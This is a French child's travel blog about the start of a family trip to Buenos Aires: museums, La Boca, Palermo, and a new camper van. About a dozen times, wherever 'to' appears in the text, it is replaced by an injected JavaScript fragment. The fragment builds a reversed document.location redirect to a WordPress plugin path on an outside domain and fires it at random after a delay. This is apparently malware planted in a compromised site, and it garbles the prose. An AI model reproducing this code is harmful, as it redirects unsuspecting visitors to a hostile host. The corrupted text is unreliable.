Buenos Aires, le début du voyage !!!

by Clément

Mercredi 4 décembre 2019

J’ai pris l’avion à Marseille pour aller à Madrid et ensuite un autre avion pour aller à Buenos Aires. Dans cet avion on mange beaucoup et on peut regarder des films.

Cet après-midi on est allé au Museo de los Niños. Ca fait un petit peu comme si on était adultes, et aussi y’a des jeux sportifs. Moi ce que j’ai préféré c’est l’escalade d’immeubles et le parcours du sous-marin.

Dans cette ville, les voitures ne font pas du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout attention aux piétoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons. Je trouve aussi que la viande est très bonne.

Samedi 7 décembre

Avant-hier on est allé à Recoleta, on a fait un musée “Prohibido no toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocar” : Interdit de ne pas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toucher. On est allé au cimetière et on a vu la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombe d’Evita.

Hier c’était l’anniversaire de papa. Le matin on est allé dans le quartier de la Boca. Il y avait des rues très colorées. On est allé voir le stade de foot et j’ai même fait une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to avec un attaquant de l’équipe de Boca Junior : Sébastian Villa. J’étais très content !!!

Clément avec Sebastian Villa, Attaquant de Boca Junior
La Boca
Maradonna
Stade La Bonbonera

On est allé voir un musée de peintre, on a vu pleins de tableaux et on a visité la maison de Benitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Quinquela Martin.

Aujourd’hui c’était visite de Palermo. Il y avait pleins de dessins sur les murs. J’ai trouvé ça sympa. On a fait 3 parcs différents en trottinette électrique, c’était trop coooooool !!!!

Ce soir il y a pleins de défilés devant la maison, ça fait beaucoup de bruit mais c’est sympa.

Samedi 14 décembre

On est parti rejoindre la famille qui nous vend le camping-car. On a loué une maison avec eux à Monte Grande. Dès qu’on est arrivé j’ai fait la connaissance d’un nouvel ami, il s’appelle Eliot. On a joué dans la piscine qui est dans le jardin de la maison.

La famille qui nous vend le camping-car a deux chiens, 1 petit qui s’appelle TOBI et 1 grande qui s’appelle FLAMME. Le soir j’ai dormi avec Lana, et Flamme est venue dormir dans mon lit. Elle m’a beaucoup reveillé, mais c’était quand même bien. Lana m’a dit que Tobi est venu me lécher le visage pendant la nuit !!!

Mon camping-car est assez grand. Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ce qu’il faut. Hier soir j’ai dormi dedans pour la première fois et j’ai très bien dormi.

Ce matin j’ai dit au revoir à mon ami Eliot. J’étais un peu triste mais j’espère le revoir en France. Puis on a pris la route. Pour moi c’était interminable.

Ce soir on dort sur le parking d’une station essence, Il pleut, il y a beaucoup d’éclairs !